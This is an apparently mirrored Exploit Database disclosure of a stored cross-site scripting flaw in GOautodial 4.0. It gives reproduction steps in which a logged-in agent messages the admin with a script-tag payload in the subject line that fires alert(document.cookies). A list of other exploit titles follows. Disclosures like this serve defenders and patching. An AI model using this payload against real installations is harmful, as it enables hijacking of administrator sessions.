GOautodial 4.0 – Persistent Cross-Site Scripting (Authenticated)

Exploit Database
81 阅读

作者： Balzabu

日期： 2020-07-26
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/48690/

# Exploit Title: GOautodial 4.0 - Persistent Cross-Site Scripting (Authenticated)
# Author: Balzabu
# Discovery Date: 2020-07-23
# Vendor Homepage: https://goautodial.org/
# Software Link: https://goautodial.org/GOautodial-4-x86_64-Final-20191010-0150.iso.html
# Tested Version: 4.0 (Last relase as of today)
# Tested on OS: CentOS 7

# STEPS TO REPRODUCE:

# 1 - Log in as an agent
# 2 - Write a new message to user goadmin with:
Subject: Help me, I can't connect to the webphone <script src=1
href=1 onerror="javascript:alert(document.cookies)"></script>
Text: whatever you want
# 3 - Send and wait for goadmin to read the message... :-)

last Exploits
GOautodial 4.0 – Persistent Cross-Site Scripting (Authenticated)的更多信息

Burning Board Lite 1.0.2 – Arbitrary File Upload：
Pointter PHP Content Management System – Unauthorized Privilege Escalation：
mooSocial 1.3 – Multiple Vulnerabilities：
Forescout CounterACT – ‘a’ Open Redirection：
Citrix Application Delivery Controller and Gateway 10.5 – Remote Code Execution (Metasploit)：
Tailor MS 1.0 – Reflected Cross-Site Scripting：
Clinic Management System – Blind SQL Injection：
Joomla! Component JE QuoteForm – ‘Itemid’ SQL Injection：